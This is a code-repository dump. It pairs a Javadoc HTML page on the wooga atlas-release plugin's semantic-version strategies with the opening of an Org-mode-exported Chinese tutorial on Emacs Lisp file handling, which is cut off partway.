class="contentContainer"> <ul class="inheritance"> <li><ul class="inheritance"></ul></li><li>wooga.gradle.release.version.semver.VersionStrategies </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== NESTED CLASS SUMMARY =========== --> <!-- =========== ENUM CONSTANT SUMMARY =========== --> <!-- =========== FIELD SUMMARY =========== --> <!-- =========== PROPERTY SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="property_summary"><!-- --></a> <h3>Properties Summary</h3> <ul class="blockList"> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Properties Summary table, listing nested classes, and an explanation"> <caption><span>Properties</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Type</th> <th class="colLast" scope="col">Name and description</th> </tr> <tr class="altColor"> <td class="colFirst"><code><strong>static&nbsp;org.ajoberstar.gradle.git.release.semver.PartialSemVerStrategy</strong></code>&nbsp;</td> <td class="colLast"><code><a href="#COUNT_INCREMENTED">COUNT_INCREMENTED</a></code><br></td> </tr> <tr class="rowColor"> <td class="colFirst"><code><strong>static&nbsp;org.ajoberstar.gradle.git.release.semver.SemVerStrategy</strong></code>&nbsp;</td> <td class="colLast"><code><a href="#DEVELOPMENT">DEVELOPMENT</a></code><br>Returns a version strategy to be used for <CODE>development</CODE> builds.</td> </tr> <tr class="altColor"> <td class="colFirst"><code><strong>static&nbsp;org.ajoberstar.gradle.git.release.semver.SemVerStrategy</strong></code>&nbsp;</td> <td class="colLast"><code><a href="#FINAL">FINAL</a></code><br>Returns a version strategy to be used for <CODE>final</CODE> builds.</td> </tr> <tr class="rowColor"> <td class="colFirst"><code><strong>static&nbsp;org.ajoberstar.gradle.git.release.semver.SemVerStrategy</strong></code>&nbsp;</td> <td class="colLast"><code><a href="#PRE_RELEASE">PRE_RELEASE</a></code><br>Returns a version strategy to be used for <CODE>pre-release</CODE>/<CODE>candidate</CODE> builds.</td> </tr> <tr class="altColor"> <td class="colFirst"><code><strong>static&nbsp;org.ajoberstar.gradle.git.release.semver.SemVerStrategy</strong></code>&nbsp;</td> <td class="colLast"><code><a href="#SNAPSHOT">SNAPSHOT</a></code><br>Returns a version strategy to be used for <CODE>snapshot</CODE> builds.</td> </tr> </table> </ul> </li> </ul> <!-- =========== ELEMENT SUMMARY =========== --> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"><!-- --></a> <h3>Inherited Methods Summary</h3> <ul class="blockList"> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Inherited Methods Summary table"> <caption><span>Inherited Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Methods inherited from class</th> <th class="colLast" scope="col">Name</th> </tr> <tr class="altColor"> <td class="colFirst"><code>class java.lang.Object</code></td> <td class="colLast"><code>java.lang.Object#wait(long, int), java.lang.Object#wait(long), java.lang.Object#wait(), java.lang.Object#equals(java.lang.Object), java.lang.Object#toString(), java.lang.Object#hashCode(), java.lang.Object#getClass(), java.lang.Object#notify(), java.lang.Object#notifyAll()</code></td> </tr> </table> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- =========== PROPERTY DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="prop_detail"> <!-- --> </a> <h3>Property Detail</h3> <a name="COUNT_INCREMENTED"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>static&nbsp;final&nbsp;org.ajoberstar.gradle.git.release.semver.PartialSemVerStrategy <strong>COUNT_INCREMENTED</strong></h4> <p></p> </li> </ul> <a name="DEVELOPMENT"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>static&nbsp;final&nbsp;org.ajoberstar.gradle.git.release.semver.SemVerStrategy <strong>DEVELOPMENT</strong></h4> <p> Returns a version strategy to be used for <CODE>development</CODE> builds. <p> This strategy creates a unique version string based on last commit hash and the distance of commits to nearest normal version. This version string is not compatible with <a href="https://fsprojects.github.io/Paket/">Paket</a> or <a href="https://www.nuget.org/">Nuget</a> <p> Example: <pre> <CODE>releaseScope = "minor" nearestVersion = "1.3.0" commitHash = "90c90b9" distance = 22 inferred = "1.3.0-dev.22+90c90b9" </CODE> </pre> </p> </li> </ul> <a name="FINAL"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>static&nbsp;final&nbsp;org.ajoberstar.gradle.git.release.semver.SemVerStrategy <strong>FINAL</strong></h4> <p> Returns a version strategy to be used for <CODE>final</CODE> builds. <p> This strategy infers the release version by checking the nearest release. <p> Example: <pre> <CODE>releaseScope = "minor" nearestVersion = "1.3.0" inferred = "1.4.0" </CODE> </pre> </p> </li> </ul> <a name="PRE_RELEASE"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>static&nbsp;final&nbsp;org.ajoberstar.gradle.git.release.semver.SemVerStrategy <strong>PRE_RELEASE</strong></h4> <p> Returns a version strategy to be used for <CODE>pre-release</CODE>/<CODE>candidate</CODE> builds. <p> This strategy infers the release version by checking the nearest any release. If a <CODE>pre-release</CODE> with the same <CODE>major</CODE>.<CODE>minor</CODE>.<CODE>patch</CODE> version exists, bumps the count part. <p> Example <i>new pre release</i>: <pre> <CODE>releaseScope = "minor" nearestVersion = "1.2.0" nearestAnyVersion = "" inferred = "1.3.0-rc00001" </CODE> </pre> <p> Example <i>pre release version exists</i>: <pre> <CODE>releaseScope = "minor" nearestVersion = "1.2.0" nearestAnyVersion = "1.3.0-rc00001" inferred = "1.3.0-rc00002" </CODE> </pre> <p> Example <i>last final release higher than pre-release</i>: <pre> <CODE>releaseScope = "minor" nearestVersion = "1.3.0" nearestAnyVersion = "1.3.0-rc00001" inferred = "1.4.0-rc00001" </CODE> </pre> </p> </li> </ul> <a name="SNAPSHOT"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>static&nbsp;final&nbsp;org.ajoberstar.gradle.git.release.semver.SemVerStrategy <strong>SNAPSHOT</strong></h4> <p> Returns a version strategy to be used for <CODE>snapshot</CODE> builds. <p> This strategy creates a snapshot version suitable for <a href="https://fsprojects.github.io/Paket/">Paket</a> and <a href="https://www.nuget.org/">Nuget</a>. <CODE>Nuget</CODE> and <CODE>Paket</CODE> don't support <CODE>SNAPSHOT</CODE> versions or any numerical values after the <CODE>patch</CODE> component. We trick these package managers by creating a unique version based on <CODE>branch</CODE> and the distance of commits to nearest normal version. If the branch name contains numerical values, they will be converted into alphanumerical counterparts. The <CODE>master</CODE> branch is a special case so it will end up being higher than any other branch build (m>b) <p> Example <i>from master branch</i>: <pre> <CODE>releaseScope = "minor" nearestVersion = "1.3.0" branch = "master" distance = 22 inferred = "1.4.0-master00022" </CODE> </pre> <p> Example <i>from topic branch</i>: <pre> <CODE>releaseScope = "minor" nearestVersion = "1.3.0" branch = "feature/fix_22" distance = 34 inferred = "1.4.0-branchFeatureFixTwoTow00034" </CODE> </pre> </p> </li> </ul> </li> </ul> </li> </ul> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <div> <ul class="navList"> <li><a href="../../../../../index.html?wooga/gradle/release/version/semver/VersionStrategies" target="_top">Frames</a></li> <li><a href="VersionStrategies.html" target="_top">No Frames</a></li> </ul> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> Nested&nbsp;&nbsp;&nbsp;Field&nbsp;&nbsp;&nbsp;<li><a href="#property_summary">Property</a></li>&nbsp;&nbsp;&nbsp;Constructor&nbsp;&nbsp;&nbsp;Method&nbsp;&nbsp;&nbsp; </ul> <ul class="subNavList"> <li>&nbsp;|&nbsp;Detail:&nbsp;</li> Field&nbsp;&nbsp;&nbsp;<li><a href="#prop_detail">Property</a></li>&nbsp;&nbsp;&nbsp;Constructor&nbsp;&nbsp;&nbsp;Method&nbsp;&nbsp;&nbsp; </ul> </div> <p>Gradle Wooga Release plugin API</p> <a name="skip-navbar_bottom"> <!-- --> </a> </div> </div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
wooga/atlas-release
docs/api/wooga/gradle/release/version/semver/VersionStrategies.html
HTML
apache-2.0
16,288
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/html;charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>文件</title> <meta name="generator" content="Org mode" /> <meta name="author" content="Wu, Shanliang" /> <style type="text/css"> <!--/*--><![CDATA[/*><!--*/ .title { text-align: center; margin-bottom: .2em; } .subtitle { text-align: center; font-size: medium; font-weight: bold; margin-top:0; } .todo { font-family: monospace; color: red; } .done { font-family: monospace; color: green; } .priority { font-family: monospace; color: orange; } .tag { background-color: #eee; font-family: monospace; padding: 2px; font-size: 80%; font-weight: normal; } .timestamp { color: #bebebe; } .timestamp-kwd { color: #5f9ea0; } .org-right { margin-left: auto; margin-right: 0px; text-align: right; } .org-left { margin-left: 0px; margin-right: auto; text-align: left; } .org-center { margin-left: auto; margin-right: auto; text-align: center; } .underline { text-decoration: underline; } #postamble p, #preamble p { font-size: 90%; margin: .2em; } p.verse { margin-left: 3%; } pre { border: 1px solid #ccc; box-shadow: 3px 3px 3px #eee; padding: 8pt; font-family: monospace; overflow: auto; margin: 1.2em; } pre.src { position: relative; overflow: visible; padding-top: 1.2em; } pre.src:before { display: none; position: absolute; background-color: white; top: -10px; right: 10px; padding: 3px; border: 1px solid black; } pre.src:hover:before { display: inline;} /* Languages per Org manual */ pre.src-asymptote:before { content: 'Asymptote'; } pre.src-awk:before { content: 'Awk'; } pre.src-C:before { content: 'C'; } /* pre.src-C++ doesn't work in CSS */ pre.src-clojure:before { content: 'Clojure'; } pre.src-css:before { content: 'CSS'; } pre.src-D:before { content: 'D'; } pre.src-ditaa:before { content: 'ditaa'; } pre.src-dot:before { content: 'Graphviz'; } pre.src-calc:before { content: 'Emacs Calc'; } pre.src-emacs-lisp:before { content: 'Emacs Lisp'; } pre.src-fortran:before { content: 'Fortran'; } pre.src-gnuplot:before { content: 'gnuplot'; } pre.src-haskell:before { content: 'Haskell'; } pre.src-hledger:before { content: 'hledger'; } pre.src-java:before { content: 'Java'; } pre.src-js:before { content: 'Javascript'; } pre.src-latex:before { content: 'LaTeX'; } pre.src-ledger:before { content: 'Ledger'; } pre.src-lisp:before { content: 'Lisp'; } pre.src-lilypond:before { content: 'Lilypond'; } pre.src-lua:before { content: 'Lua'; } pre.src-matlab:before { content: 'MATLAB'; } pre.src-mscgen:before { content: 'Mscgen'; } pre.src-ocaml:before { content: 'Objective Caml'; } pre.src-octave:before { content: 'Octave'; } pre.src-org:before { content: 'Org mode'; } pre.src-oz:before { content: 'OZ'; } pre.src-plantuml:before { content: 'Plantuml'; } pre.src-processing:before { content: 'Processing.js'; } pre.src-python:before { content: 'Python'; } pre.src-R:before { content: 'R'; } pre.src-ruby:before { content: 'Ruby'; } pre.src-sass:before { content: 'Sass'; } pre.src-scheme:before { content: 'Scheme'; } pre.src-screen:before { content: 'Gnu Screen'; } pre.src-sed:before { content: 'Sed'; } pre.src-sh:before { content: 'shell'; } pre.src-sql:before { content: 'SQL'; } pre.src-sqlite:before { content: 'SQLite'; } /* additional languages in org.el's org-babel-load-languages alist */ pre.src-forth:before { content: 'Forth'; } pre.src-io:before { content: 'IO'; } pre.src-J:before { content: 'J'; } pre.src-makefile:before { content: 'Makefile'; } pre.src-maxima:before { content: 'Maxima'; } pre.src-perl:before { content: 'Perl'; } pre.src-picolisp:before { content: 'Pico Lisp'; } pre.src-scala:before { content: 'Scala'; } pre.src-shell:before { content: 'Shell Script'; } pre.src-ebnf2ps:before { content: 'ebfn2ps'; } /* additional language identifiers per "defun org-babel-execute" in ob-*.el */ pre.src-cpp:before { content: 'C++'; } pre.src-abc:before { content: 'ABC'; } pre.src-coq:before { content: 'Coq'; } pre.src-groovy:before { content: 'Groovy'; } /* additional language identifiers from org-babel-shell-names in ob-shell.el: ob-shell is the only babel language using a lambda to put the execution function name together. */ pre.src-bash:before { content: 'bash'; } pre.src-csh:before { content: 'csh'; } pre.src-ash:before { content: 'ash'; } pre.src-dash:before { content: 'dash'; } pre.src-ksh:before { content: 'ksh'; } pre.src-mksh:before { content: 'mksh'; } pre.src-posh:before { content: 'posh'; } /* Additional Emacs modes also supported by the LaTeX listings package */ pre.src-ada:before { content: 'Ada'; } pre.src-asm:before { content: 'Assembler'; } pre.src-caml:before { content: 'Caml'; } pre.src-delphi:before { content: 'Delphi'; } pre.src-html:before { content: 'HTML'; } pre.src-idl:before { content: 'IDL'; } pre.src-mercury:before { content: 'Mercury'; } pre.src-metapost:before { content: 'MetaPost'; } pre.src-modula-2:before { content: 'Modula-2'; } pre.src-pascal:before { content: 'Pascal'; } pre.src-ps:before { content: 'PostScript'; } pre.src-prolog:before { content: 'Prolog'; } pre.src-simula:before { content: 'Simula'; } pre.src-tcl:before { content: 'tcl'; } pre.src-tex:before { content: 'TeX'; } pre.src-plain-tex:before { content: 'Plain TeX'; } pre.src-verilog:before { content: 'Verilog'; } pre.src-vhdl:before { content: 'VHDL'; } pre.src-xml:before { content: 'XML'; } pre.src-nxml:before { content: 'XML'; } /* add a generic configuration mode; LaTeX export needs an additional (add-to-list 'org-latex-listings-langs '(conf " ")) in .emacs */ pre.src-conf:before { content: 'Configuration File'; } table { border-collapse:collapse; } caption.t-above { caption-side: top; } caption.t-bottom { caption-side: bottom; } td, th { vertical-align:top; } th.org-right { text-align: center; } th.org-left { text-align: center; } th.org-center { text-align: center; } td.org-right { text-align: right; } td.org-left { text-align: left; } td.org-center { text-align: center; } dt { font-weight: bold; } .footpara { display: inline; } .footdef { margin-bottom: 1em; } .figure { padding: 1em; } .figure p { text-align: center; } .inlinetask { padding: 10px; border: 2px solid gray; margin: 10px; background: #ffffcc; } #org-div-home-and-up { text-align: right; font-size: 70%; white-space: nowrap; } textarea { overflow-x: auto; } .linenr { font-size: smaller } .code-highlighted { background-color: #ffff00; } .org-info-js_info-navigation { border-style: none; } #org-info-js_console-label { font-size: 10px; font-weight: bold; white-space: nowrap; } .org-info-js_search-highlight { background-color: #ffff00; color: #000000; font-weight: bold; } .org-svg { width: 90%; } /*]]>*/--> </style> <link rel="stylesheet" type="text/css" href="../css/main.css" /> <script type="text/javascript"> /* @licstart The following is the entire license notice for the JavaScript code in this tag. Copyright (C) 2012-2019 Free Software Foundation, Inc. The JavaScript code in this tag is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License (GNU GPL) as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. The code is distributed WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU GPL for more details. As additional permission under GNU GPL version 3 section 7, you may distribute non-source (e.g., minimized or compacted) forms of that code without the copy of the GNU GPL normally required by section 4, provided you include this license notice and a URL through which recipients can access the Corresponding Source. @licend The above is the entire license notice for the JavaScript code in this tag. */ <!--/*--><![CDATA[/*><!--*/ function CodeHighlightOn(elem, id) { var target = document.getElementById(id); if(null != target) { elem.cacheClassElem = elem.className; elem.cacheClassTarget = target.className; target.className = "code-highlighted"; elem.className = "code-highlighted"; } } function CodeHighlightOff(elem, id) { var target = document.getElementById(id); if(elem.cacheClassElem) elem.className = elem.cacheClassElem; if(elem.cacheClassTarget) target.className = elem.cacheClassTarget; } /*]]>*///--> </script> </head> <body> <div id="org-div-home-and-up"> <a accesskey="h" href="operation-objects.html"> UP </a> | <a accesskey="H" href="../elisp.html"> HOME </a> </div><div id="content"> <h1 class="title">文件</h1> <div id="table-of-contents"> <h2>Table of Contents</h2> <div id="text-table-of-contents"> <ul> <li><a href="#org760b7c8">打开文件</a></li> <li><a href="#org53d8f23">文件读写</a></li> <li><a href="#org90be9ba">文件信息</a></li> <li><a href="#orgf9e4cd2">修改文件信息</a></li> <li><a href="#orgfb973bd">文件名操作</a></li> <li><a href="#org649f07e">临时文件</a></li> <li><a href="#org14afedb">读取目录内容</a></li> <li><a href="#orgfbd11db">文件Handle</a></li> </ul> </div> </div> <pre class="example"> 作为一个编辑器,自然文件是最重要的操作对象之一 这一节要介绍有关文件的一系列命令,比如查找文件,读写文件,文件信息、读取目录、文件名操作等 </pre> <div id="outline-container-org760b7c8" class="outline-2"> <h2 id="org760b7c8">打开文件</h2> <div class="outline-text-2" id="text-org760b7c8"> <p> 当打开一个文件时,实际上 emacs 做了很多事情: </p> <ul class="org-ul"> <li>把文件名展开成为完整的文件名</li> <li>判断文件是否存在</li> <li>判断文件是否可读或者文件大小是否太大</li> <li>查看文件是否已经打开,是否被锁定</li> <li>向缓冲区插入文件内容</li> <li>设置缓冲区的模式</li> </ul> <pre class="example"> 这还只是简单的一个步骤,实际情况比这要复杂的多,许多异常需要考虑 而且为了所有函数的可扩展性,许多变量、handler 和 hook 被加入到文件操作的函数中,使得每一个环节都可以让用户或者 elisp 开发者可以定制,甚至完全接管所有的文件操作 </pre> <p> 这里需要区分两个概念:文件和缓冲区。它们是两个不同的对象: </p> <ul class="org-ul"> <li>文件:是在计算机上可持久保存的信息</li> <li>缓冲区: Emacs 中包含文件内容信息的对象,在 emacs 退出后就会消失,只有当保存缓冲区之后缓冲区里的内容才写到文件中去</li> </ul> </div> </div> <div id="outline-container-org53d8f23" class="outline-2"> <h2 id="org53d8f23">文件读写</h2> <div class="outline-text-2" id="text-org53d8f23"> <p> 打开一个文件的命令是 <span class="underline">find-file</span> : 这命令使一个缓冲区访问某个文件,并让这个缓冲区成为当前缓冲区 </p> <ul class="org-ul"> <li><span class="underline">find-file-noselect</span> :所有访问文件的核心函数,它只返回访问文件的缓冲区</li> <li>find-file 在打开文件过程中会调用 <span class="underline">find-file-hook</span></li> </ul> <p> 这两个函数都有一个特点,如果 emacs 里已经有一个缓冲区访问这个文件的话,emacs 不会创建另一个缓冲区来访问文件,而只是简单返回或者转到这个缓冲区 </p> <pre class="example"> 怎样检查有没有缓冲区是否访问某个文件呢? 所有和文件关联的缓冲区里都有一个 buffer-local 变量buffer-file-name。但是不要直接设置这个变量来改变缓冲区关联的文件,而是使用 set-visited-file-name 来修改 同样不要直接从 buffer-list 里搜索buffer-file-name 来查找和某个文件关联的缓冲区,应该使用get-file-buffer 或者 find-buffer-visiting </pre> <div class="org-src-container"> <pre class="src src-lisp">(find-file <span style="color: #deb887;">"~/tmp/test.txt"</span>) (<span style="color: #00bfff; font-weight: bold;">with-current-buffer</span> (find-file-noselect <span style="color: #deb887;">"~/tmp/test.txt"</span>) buffer-file-name) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "/home/klose/tmp/test.txt"</span> (find-buffer-visiting <span style="color: #deb887;">"~/tmp/test.txt"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; #&lt;buffer test.txt&gt;</span> (get-file-buffer <span style="color: #deb887;">"~/tmp/test.txt"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; #&lt;buffer test.txt&gt;</span> </pre> </div> <p> 保存一个文件的过程相对简单一些: </p> <ol class="org-ol"> <li>首先创建备份文件</li> <li>处理文件的位模式</li> <li>将缓冲区写入文件</li> </ol> <p> 保存文件的命令是 <span class="underline">save-buffer</span> </p> <ul class="org-ul"> <li>相当于其它编辑器里 <b>另存为</b> 的命令是 <span class="underline">write-file</span> ,在这个过程中会调用一些函数或者 hook: <ul class="org-ul"> <li>write-file-functions 和 write-contents-functions 几乎功能完全相同,都是在写入文件之前运行的函数,如果这些函数中有一个返回了 non-nil 的值, 则会认为文件已经写入了,后面的函数都不会运行,而且也不会使用再调用其它 写入文件的函数 <ul class="org-ul"> <li>这两个变量有一个重要的区别是write-contents-functions 在改变主模式之后会被修改,因为它没有permanent-local 属性,而 write-file-functions 则会仍然保留</li> </ul></li> <li>before-save-hook 和 write-file-functions 功能也比较类似,但是这个变量里的函数会逐个执行,不论返回什么值也不会影响后面文件的写入</li> <li>after-save-hook 是在文件已经写入之后才调用的 hook,它是 save-buffer 最后一个动作</li> </ul></li> </ul> <pre class="example"> 但是实际上在 elisp 编程过程中经常遇到的一个问题是读取一个文件中的内容, 读取完之后并不希望这个缓冲区还留下来 如果直接用 kill-buffer 可能会把用户打开的文件关闭。而且 find-file-noselect 做的事情实在超出我们的需要 </pre> <p> 这时可能需要的是更底层的文件读写函数,它们是 <span class="underline">insert-file-contents</span> 和 <span class="underline">write-region</span> ,调用形式分别是: </p> <div class="org-src-container"> <pre class="src src-lisp">(insert-file-contents filename <span style="color: #98f5ff;">&amp;optional</span> visit beg end replace) (write-region start end filename <span style="color: #98f5ff;">&amp;optional</span> append visit lockname mustbenew) </pre> </div> <p> <span class="underline">insert-file-contents</span> 可以插入文件中指定部分到当前缓冲区中: </p> <ul class="org-ul"> <li>如果指定 visit 则会标记缓冲区的修改状态并关联缓冲区到文件,一般是不用的</li> <li>replace 是指是否要删除缓冲区里其它内容,这比先删除缓冲区其它内容后插入文件内容要快一些,但是一般也用不上</li> </ul> <pre class="example"> insert-file-contents 会处理文件的编码,如果不需要解码文件的话,可以用 insert-file-contents-literally </pre> <p> <span class="underline">write-region</span> 可以把缓冲区中的一部分写入到指定文件中: </p> <ul class="org-ul"> <li>如果指定 append 则是添加到文件末尾</li> <li>visit 参数也会把缓冲区和文件关联</li> <li>lockname 则是文件锁定的名字</li> <li>mustbenew 确保文件存在时会要求用户确认操作</li> </ul> </div> </div> <div id="outline-container-org90be9ba" class="outline-2"> <h2 id="org90be9ba">文件信息</h2> <div class="outline-text-2" id="text-org90be9ba"> <ul class="org-ul"> <li>文件是否存在可以使用 <span class="underline">file-exists-p</span> 来判断:对于目录和一般文件都可以用这个函数进行判断 <ul class="org-ul"> <li>符号链接只有当 <span class="underline">目标文件</span> 存在时才返回 t</li> </ul></li> <li><span class="underline">file-readable-p</span> 、 <span class="underline">file-writable-p</span> , <span class="underline">file-executable-p</span> 分用来测试用户对文件的权限 <ul class="org-ul"> <li>文件的位模式还可以用 <span class="underline">file-modes</span> 函数得到</li> </ul></li> </ul> <div class="org-src-container"> <pre class="src src-lisp">(file-exists-p <span style="color: #deb887;">"~/tmp/test.txt"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; t</span> (file-readable-p <span style="color: #deb887;">"~/tmp/test.txt"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; t</span> (file-writable-p <span style="color: #deb887;">"~/tmp/test.txt"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; t</span> (file-executable-p <span style="color: #deb887;">"~/tmp/test.txt"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; nil</span> (format <span style="color: #deb887;">"%o"</span> (file-modes <span style="color: #deb887;">"~/tmp/test.txt"</span>)) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "644"</span> </pre> </div> <p> 文件类型判断: </p> <ul class="org-ul"> <li><span class="underline">file-regular-p</span> : 判断一个文件名是否是一个普通文件(不是目录,命名管道、终端或者其它 IO 设备)</li> <li><span class="underline">file-directory-p</span>: 判断一个文件名是否一个存在的目录</li> <li><span class="underline">file-symlink-p</span> : 判断一个文件名是否是一个符号链接 <ul class="org-ul"> <li>当文件名是一个符号链接时会返回 <span class="underline">目标文件名</span></li> <li>文件的真实名字也就是除去相对链接和符号链接后得到的文件名可以用 <span class="underline">file-truename</span> 得到</li> </ul></li> </ul> <pre class="example"> 事实上每个和文件关联的 buffer 里也有一个缓冲区局部变量 buffer-file-truename 来记录这个文件名 </pre> <div class="org-src-container"> <pre class="src src-sh">$ ls -l t.txt lrwxrwxrwx 1 klose klose 8 2007-07-15 15:51 t.txt -&gt; test.txt </pre> </div> <div class="org-src-container"> <pre class="src src-lisp">(file-regular-p <span style="color: #deb887;">"~/tmp/t.txt"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; t</span> (file-directory-p <span style="color: #deb887;">"~/tmp/t.txt"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; nil</span> (file-symlink-p <span style="color: #deb887;">"~/tmp/t.txt"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "test.txt"</span> (file-truename <span style="color: #deb887;">"~/tmp/t.txt"</span>) <span style="color: #5f9ea0; font-style: italic;">; =&gt; "/home/klose/tmp/test.txt"</span> </pre> </div> <p> 文件更详细的信息可以用 <span class="underline">file-attributes</span> 函数得到。这个函数类似系统的 stat 命令,返回文件几乎所有的信息,包括 <span class="underline">文件类型</span> , <span class="underline">用户</span> 和 <span class="underline">组用户</span> , <span class="underline">访问日期</span> 、 <span class="underline">修改日期</span> 、 <span class="underline">status change 日期</span> 、 <span class="underline">文件大小</span> 、 <span class="underline">文件位模式</span> 、 <span class="underline">inode number</span> 、 <span class="underline">system number</span> &#x2026;.. </p> <div class="org-src-container"> <pre class="src src-lisp">(<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-stat-type</span> (file <span style="color: #98f5ff;">&amp;optional</span> id-format) (car (file-attributes file id-format))) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-stat-name-number</span> (file <span style="color: #98f5ff;">&amp;optional</span> id-format) (cadr (file-attributes file id-format))) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-stat-uid</span> (file <span style="color: #98f5ff;">&amp;optional</span> id-format) (nth 2 (file-attributes file id-format))) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-stat-gid</span> (file <span style="color: #98f5ff;">&amp;optional</span> id-format) (nth 3 (file-attributes file id-format))) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-stat-atime</span> (file <span style="color: #98f5ff;">&amp;optional</span> id-format) (nth 4 (file-attributes file id-format))) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-stat-mtime</span> (file <span style="color: #98f5ff;">&amp;optional</span> id-format) (nth 5 (file-attributes file id-format))) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-stat-ctime</span> (file <span style="color: #98f5ff;">&amp;optional</span> id-format) (nth 6 (file-attributes file id-format))) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-stat-size</span> (file <span style="color: #98f5ff;">&amp;optional</span> id-format) (nth 7 (file-attributes file id-format))) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-stat-modes</span> (file <span style="color: #98f5ff;">&amp;optional</span> id-format) (nth 8 (file-attributes file id-format))) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-stat-guid-changep</span> (file <span style="color: #98f5ff;">&amp;optional</span> id-format) (nth 9 (file-attributes file id-format))) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-stat-inode-number</span> (file <span style="color: #98f5ff;">&amp;optional</span> id-format) (nth 10 (file-attributes file id-format))) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-stat-system-number</span> (file <span style="color: #98f5ff;">&amp;optional</span> id-format) (nth 11 (file-attributes file id-format))) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-attr-type</span> (attr) (car attr)) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-attr-name-number</span> (attr) (cadr attr)) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-attr-uid</span> (attr) (nth 2 attr)) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-attr-gid</span> (attr) (nth 3 attr)) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-attr-atime</span> (attr) (nth 4 attr)) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-attr-mtime</span> (attr) (nth 5 attr)) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-attr-ctime</span> (attr) (nth 6 attr)) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-attr-size</span> (attr) (nth 7 attr)) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-attr-modes</span> (attr) (nth 8 attr)) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-attr-guid-changep</span> (attr) (nth 9 attr)) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-attr-inode-number</span> (attr) (nth 10 attr)) (<span style="color: #00bfff; font-weight: bold;">defun</span> <span style="color: #daa520; font-weight: bold;">file-attr-system-number</span> (attr) (nth 11 attr)) </pre> </div> <pre class="example"> 